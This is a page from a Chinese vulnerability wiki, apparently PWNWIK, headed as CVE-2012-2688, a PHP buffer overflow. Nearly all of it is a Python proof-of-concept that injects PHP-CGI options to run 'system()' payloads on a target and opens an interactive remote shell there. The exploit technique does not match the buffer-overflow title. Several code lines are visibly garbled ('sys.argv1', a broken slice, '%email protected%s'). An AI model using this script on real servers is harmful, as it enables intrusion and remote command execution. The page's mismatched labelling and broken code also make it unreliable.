Loading
0

CVE-2012-2688 PHP before 5.3.15 and 5.4.x before 5.4.5 缓冲区溢出漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

POC

#!/usr/bin/python
import requests
import sys

if len(sys.argv) != 2:
    print("Usage: sh.py <target>")
    sys.exit(0)

target = sys.argv1
url = 'http://' + target + '/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input'
payload = "<?php system('cmd');die(); ?>"
try:
    vuln1 = requests.post(url, data=payload.replace('cmd', 'uname -a'))
except Exception as msg:
    print('%s: %s' % (target, msg))
    quit()
    
print('%s: Connection suceeded' % target)


if len(vuln1.text) > 120:
    print("SHELL FAILED: Can not create a shell")
    quit()
    
if not 'linux' in vuln1.text.lower() and not 'mac' in vuln1.text.lower():
    vuln2 = requests.post(url, data=payload.replace('cmd', 'ver'))
    if not 'windows' in vuln2.text.lower():
        print("SHELL FAILED: Can't not create a shell")
        quit()
    oper = 'win'
    print('''%s
(c) Microsoft Corporation. All rights reserved.
''' % vuln2)
    end = '\n'
    
else:
    oper = 'unix'
    usr = requests.post(url, data=payload.replace('cmd', 'whoami')).text
    end = ''
    print('')
    
    
while True:
    try:
        pth = requests.post(url, data="<?php echo getcwd(); ?>").text
        if oper == 'win':
            cmd = input("%s> " % pth)
        else:
            priv = '$'
            if usr == 'root':
                priv = '#'
            if usr != 'root' and '/home/%s' % usr in pth:
                pth = '~%s' % pth.replace('/home/%s', '')
            cmd = input("%email protected%s:%s%s" % (usr, target, pth, priv))

        if cmd.replace(' ', '')2: == 'cd':
            cmd = "<?php chdir(%s); ?>" % cmd.replace(' ', ''):2
        data = payload.replace('cmd', cmd)
        resp = requests.post(url, data=data)
        print(resp.text + end)
    except KeyboardInterrupt:
        print("^C")
        sys.exit(1)
    except:
        print("SHELL FAILED: An unknown error occur")
        quit()


PWNWIK.COM==免费、自由、人人可编辑的漏洞库